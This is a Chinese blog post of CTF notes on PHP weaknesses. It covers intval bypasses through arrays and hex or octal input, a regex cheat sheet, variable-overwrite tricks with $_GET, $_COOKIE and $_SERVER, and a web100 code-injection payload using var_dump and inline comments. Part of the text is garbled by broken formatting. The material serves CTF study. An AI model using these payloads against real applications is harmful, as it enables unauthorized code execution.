本文探讨了PHP中intval函数的数组绕过02进制转换技巧,以及payload利用字符特性和HTTP头注入的实战案例。涉及v2/v3命令操作和字符串处理,如`var_dump`输出、内联注释等。同时讲解了如何利用GET、POST、COOKIE和SERVER变量覆盖条件判断获取flag。
01
intval函数
通过数组绕过
02
进制转换or加个空格在前面。
payload
?num= 4476
?num=0x117c
?num=010574
03
符号含义[abc]A single character: a, b or c
[^abc]Any single character but a, b, or c
[a-z]Any single character in the range a-z
[a-zA-Z]Any single character in the range a-z or A-Z
^Start of line
$End of line
\AStart of string
\zEnd of string
\sAny whitespace character
\SAny non-whitespace character
\dAny digit
\DAny non-digit
\wAny word character (letter, number, underscore)
\WAny non-word character
\bAny word boundary character
(a|b)a or b
a?Zero or one of a
a*Zero or more of a
a+One or more of a
a{3}Exactly 3 of a
a{3,}3 or more of a
a{3,6}Between 3 and 6 of a
.Any single character
(…)Capture everything enclosed
04
在linux下面表示当前目录是 ./
05
include("flag.php");
#若存在GET传值,用POST的值覆盖
$_GET?$_GET=&$_POST:'flag';
#flag参数等于flag,就用$_COOKIE进行覆盖。这里让flag参数不等于flag值就好了
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
#存在HTTP_FLAG参数等于flag,就出最终的flag答案
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
?>
06
web100
v
2
(
′
c
t
f
s
h
o
w
′
)
v2('ctfshow')
v2(′ctfshow′)v3,其中v2肯定是命令,v3传分号
v0是三个值相与,v2和v3不传数字和v1数字相与就为1
payload:
?v1=1&v2=var_dump($ctfshow)&v3=;
或者v3直接用内联注释注释掉
?v1=1&v2=var_dump($ctfshow)/*&v3=*/;
07
标签:aa,character,single,特性,v2,v3,php,Any
来源: https://blog.csdn.net/weixin_46409891/article/details/113640257
扫一扫
976
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
